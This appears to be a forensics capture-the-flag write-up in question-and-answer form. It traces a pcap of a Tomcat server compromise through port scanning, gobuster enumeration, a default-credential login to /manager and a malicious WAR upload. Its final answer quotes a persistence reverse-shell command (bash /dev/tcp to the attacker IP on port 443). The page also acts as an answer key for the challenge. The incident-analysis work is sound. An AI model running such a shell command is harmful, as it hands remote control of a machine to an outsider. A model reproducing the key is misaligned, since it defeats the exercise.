type
status
date
slug
summary
tags
category
icon
password
Catagory
Materials
Retired
Retired
Due date
May 28, 2024 05:25 AM
Status
Belong in

Progress

Q 1

Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
Ans:14.0.0.120
notion image
Port scan
Port scan

Q 2

Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker's activities originated?
Ans:Guangzhou
notion image

Q 3

From the pcap analysis, multiple open ports were detected as a result of the attacker's activitie scan. Which of these ports provides access to the web server admin panel?
Ans:8080
notion image
notion image

Q 4

Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
Ans:gobuster
notion image

Q 5

Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?
Ans:/manager
notion image

Q 6

Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?
Ans:admin:tomcat
notion image

Q 7

Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
Ans:JXQOZY.war
notion image

Q 8

Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
在10.0.0.112安裝tomcat
在10.0.0.112安裝tomcat
notion image
notion image
/bin/bash -c ‘bash -i >&/dev/tcp/14.0.0.120 /443 0>&1’
/bin/bash -c ‘bash -i >&/dev/tcp/14.0.0.120 /443 0>&1’

Link to Notes

    Reference

    What is CSRF (Cross-site request forgery)? Tutorial & Examples | Web Security Academy
    In this section, we'll explain what cross-site request forgery is, describe some examples of common CSRF vulnerabilities, and explain how to prevent CSRF ...
    What is CSRF (Cross-site request forgery)? Tutorial & Examples | Web Security Academy
    https://portswigger.net/web-security/csrf
    What is CSRF (Cross-site request forgery)? Tutorial & Examples | Web Security Academy
     
    相關文章
    Sharlocks - Litter
    Sharlocks - Brutus
    Sharklocks - Meerkat
    Sharklocks - Meerkat2024資安大會 cyber arena writeup